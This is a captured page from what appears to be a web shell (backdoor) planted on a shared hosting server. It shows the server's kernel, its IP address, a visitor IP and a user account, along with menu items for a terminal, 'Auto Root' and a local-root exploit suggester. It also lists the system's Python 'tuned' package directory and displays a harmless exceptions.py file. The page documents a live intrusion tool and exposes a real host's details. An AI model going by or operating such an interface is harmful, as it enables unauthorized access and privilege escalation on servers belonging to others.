Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
python2.7 /
site-packages /
tuned /
Delete
Unzip
Name
Size
Permission
Date
Action
admin
[ DIR ]
drwxr-xr-x
2022-09-25 02:17
daemon
[ DIR ]
drwxr-xr-x
2022-09-25 02:17
exports
[ DIR ]
drwxr-xr-x
2022-09-25 02:17
hardware
[ DIR ]
drwxr-xr-x
2022-09-25 02:17
monitors
[ DIR ]
drwxr-xr-x
2022-09-25 02:17
plugins
[ DIR ]
drwxr-xr-x
2022-09-25 02:17
profiles
[ DIR ]
drwxr-xr-x
2022-09-25 02:17
storage
[ DIR ]
drwxr-xr-x
2022-09-25 02:17
units
[ DIR ]
drwxr-xr-x
2022-09-25 02:17
utils
[ DIR ]
drwxr-xr-x
2022-09-25 02:17
__init__.py
953
B
-rw-r--r--
2019-03-21 18:10
__init__.pyc
301
B
-rw-r--r--
2022-09-21 09:17
__init__.pyo
301
B
-rw-r--r--
2022-09-21 09:17
consts.py
4.4
KB
-rw-r--r--
2019-03-21 18:10
consts.pyc
4.67
KB
-rw-r--r--
2022-09-21 09:17
consts.pyo
4.67
KB
-rw-r--r--
2022-09-21 09:17
exceptions.py
568
B
-rw-r--r--
2019-03-21 18:10
exceptions.pyc
1.22
KB
-rw-r--r--
2022-09-21 09:17
exceptions.pyo
1.22
KB
-rw-r--r--
2022-09-21 09:17
logs.py
3.75
KB
-rw-r--r--
2019-03-21 18:10
logs.pyc
5.6
KB
-rw-r--r--
2022-09-21 09:17
logs.pyo
5.56
KB
-rw-r--r--
2022-09-21 09:17
patterns.py
335
B
-rw-r--r--
2019-03-21 18:10
patterns.pyc
937
B
-rw-r--r--
2022-09-21 09:17
patterns.pyo
937
B
-rw-r--r--
2022-09-21 09:17
version.py
73
B
-rw-r--r--
2019-03-21 18:10
version.pyc
245
B
-rw-r--r--
2022-09-21 09:17
version.pyo
245
B
-rw-r--r--
2022-09-21 09:17
Save
Rename
import tuned.logs import sys import traceback exception_logger = tuned.logs.get() class TunedException(Exception): """ """ def log(self, logger = None): if logger is None: logger = exception_logger logger.error(str(self)) self._log_trace(logger) def _log_trace(self, logger): (exc_type, exc_value, exc_traceback) = sys.exc_info() if exc_value != self: logger.debug("stack trace is no longer available") else: exception_info = "".join(traceback.format_exception(exc_type, exc_value, exc_traceback)).rstrip() logger.debug(exception_info)